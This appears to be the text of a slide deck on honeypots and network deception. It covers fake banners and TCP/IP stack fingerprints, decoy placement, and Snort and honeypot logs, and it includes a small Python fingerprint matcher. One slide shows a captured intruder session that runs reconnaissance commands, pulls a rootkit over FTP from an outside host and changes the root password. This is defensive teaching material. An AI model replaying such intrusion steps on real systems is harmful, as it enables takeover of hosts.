Honeypot Advantages & Disadvantages

Intelligence Gathering
# cd /; ls -alF; w; uname -a; id
# ftp ftp.0catch.com
# ls
# ftp
# open
# ftp.0catch.com
# rootkit.0catch.com
# szopol
# ls
# passwd root
# wget
Perception Management

Battlefield deception consists of those operations conducted at echelons theater (Army component) and below which purposely mislead enemy decision makers by:
* Distortion
* Concealment
* Falsification of indicators of friendly intentions, capabilities, or dispositions.
US Army FM 90-2
Honeypot Best Practices
Perception Management

Perception Management: False Banners

Perception Management: False TCP/IP Stacks

# wwww:ttt:mmm:D:W:S:N:I:OS Description
#
# wwww - window size
# ttt  - time to live
# mmm  - maximum segment size
# D    - don't fragment flag (0=unset, 1=set)
# W    - window scaling (-1=not present, other=value)
# S    - sackOK flag (0=unset, 1=set)
# N    - nop flag (0=unset, 1=set)
# I    - packet size (-1=irrelevant)
Perception Management: False TCP/IP Stacks

# wwww:ttt:mmm:D:W:S:N:I:OS Description
5840:128:536:1:0:1:1:48:Windows 95 (3)
16060:64:1460:1:0:1:1:60:Debian/Caldera Linux 2.2.x
8760:255:1380:1:0:0:0:44:Solaris 2.7
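As an added example (not code from the slides), a small Python parser for the p0f-style fingerprint lines above, plus a matcher that checks one observed SYN against them the way a passive fingerprinter does, which is how a defender would verify that a decoy's faked stack actually reads as the intended OS. The SYN field names, the sample entries (copied from the slide) and the 32-hop TTL allowance are assumptions.

```python
from dataclasses import dataclass

# Constructed sample database: the three entries shown on the slide (p0f v1 format).
FINGERPRINTS = """\
# wwww:ttt:mmm:D:W:S:N:I:OS Description
5840:128:536:1:0:1:1:48:Windows 95 (3)
16060:64:1460:1:0:1:1:60:Debian/Caldera Linux 2.2.x
8760:255:1380:1:0:0:0:44:Solaris 2.7
"""
MAX_HOPS = 32  # assumption: how far below its initial value a SYN's TTL may have decayed


@dataclass(frozen=True)
class Fingerprint:
    win: int      # wwww: TCP window size
    ttl: int      # ttt: initial time to live
    mss: int      # mmm: maximum segment size
    df: int       # D: don't-fragment flag
    wscale: int   # W: window scaling (-1 = option not present)
    sack: int     # S: sackOK flag
    nop: int      # N: nop flag
    size: int     # I: SYN packet size (-1 = irrelevant)
    os: str       # free-text OS description


def parse_fingerprints(text: str) -> list[Fingerprint]:
    """Parse colon-separated lines; only the ninth field (OS) may itself contain colons."""
    db = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":", 8)
        if len(parts) != 9:
            raise ValueError(f"malformed fingerprint line: {line!r}")
        db.append(Fingerprint(*(int(p) for p in parts[:8]), parts[8]))
    return db


def match_syn(syn: dict, db: list[Fingerprint]) -> list[str]:
    """Return the OS labels consistent with one observed SYN (same eight integer fields)."""
    hits = []
    for fp in db:
        if any(syn[k] != getattr(fp, k) for k in ("win", "mss", "df", "wscale", "sack", "nop")):
            continue
        if fp.size != -1 and syn["size"] != fp.size:
            continue
        # TTL is decremented per hop, so accept values a bounded distance below the initial TTL
        if not (fp.ttl - MAX_HOPS < syn["ttl"] <= fp.ttl):
            continue
        hits.append(fp.os)
    return hits
```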
Perception Management: Decoys, Honeypots, Honeynets

Engineering Deception

Engineering Deception: Exposed Decoys

[Diagram: exposed decoys; honeypots placed beside the WWW and SMTP/DNS hosts]
Engineering Deception: Interleaved Decoys

[Diagram: interleaved decoys; in the DMZ a honeypot (HP) sits between the WWW host and the other hosts]
Engineering Deception: Lateral Decoys

[Diagram: lateral decoys; honeypots (HP) spread across the 10.2.8.0/22 and 10.2.4.0/22 networks beside the WWW, SMTP/DNS and other hosts]
Engineering Deception: Production Honeypots

Engineering Deception: Research Honeypots

Security Alliances

Isn't Network IDS enough?

[**] [1:618:2] SCAN Squid Proxy attempt [**]
[Classification: Attempted Information Leak] [Priority: 2]
11/04-08:09:27.772993 216.218.184.2:3704 -> 10.2.87.142:3128
TCP TTL:49 TOS:0x0 ID:35607 IpLen:20 DgmLen:44 DF
******S* Seq: 0x13C82726  Ack: 0x0  Win: 0x4000  TcpLen: 24
TCP Options (1) => MSS: 1412

[**] [100:1:1] spp_portscan: PORTSCAN DETECTED from 216.218.184.2 (THRESHOLD 4 connections exceeded in 0 seconds) [**]
11/04-20:19:09.882416

Snort Network Intrusion Detection System alert - http://www.snort.org
Isn't Network IDS enough?

GET http://216.218.184.9/pI9Ob6SZcWQR2ODUWOopFg/3128/10287142 HTTP/1.0
Connection: close
Pragma: no-cache
Accept: text/html
Host: 216.218.184.9
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; AOL 5.0; Windows 98)
CLIENT-IP: 10.2.87.142
X-FORWARDED-FOR: 10.2.87.142

Tiny Honeypot log
Isn't Network IDS enough?

GET http://216.218.184.9/pI9Ob6SZcWQR2ODUWOopFg/81/10287142 HTTP/1.0
Connection: close
Pragma: no-cache
Accept: text/html
Host: 216.218.184.9
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; AOL 5.0; Windows 98)
CLIENT-IP: 10.2.87.142
X-FORWARDED-FOR: 10.2.87.142

Tiny Honeypot log
if ($value == "high") { $cost = "high" }

Deployment costs
Analysis costs
Potential for greater risk

Honeypot Advantages & Disadvantages

George Bakos - gbakos@ists.dartmouth.edu
Jay Beale - jay@bastille-linux.org